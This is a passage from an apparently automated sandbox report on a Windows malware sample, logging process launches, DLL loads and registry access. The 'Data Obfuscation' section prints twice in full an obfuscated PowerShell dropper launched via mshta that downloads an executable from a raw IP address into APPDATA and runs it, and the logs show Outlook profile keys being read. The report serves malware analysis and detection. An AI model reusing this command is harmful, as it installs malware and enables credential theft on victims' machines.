Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" "c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\cossess.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: cossess.exe, 00000006.00000003.962684493.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, cossess.exe, 00000006.00000003.962416999.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cossess.exe, 00000006.00000003.962684493.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, cossess.exe, 00000006.00000003.962416999.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TenantRestrictions\Payloadata\Local\Temp\dkem0svg\dkem0svg.pdb source: powershell.exe, 00000003.00000002.989978831.0000000007555000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: q;C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.pdb source: powershell.exe, 00000003.00000002.981931540.0000000005393000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; 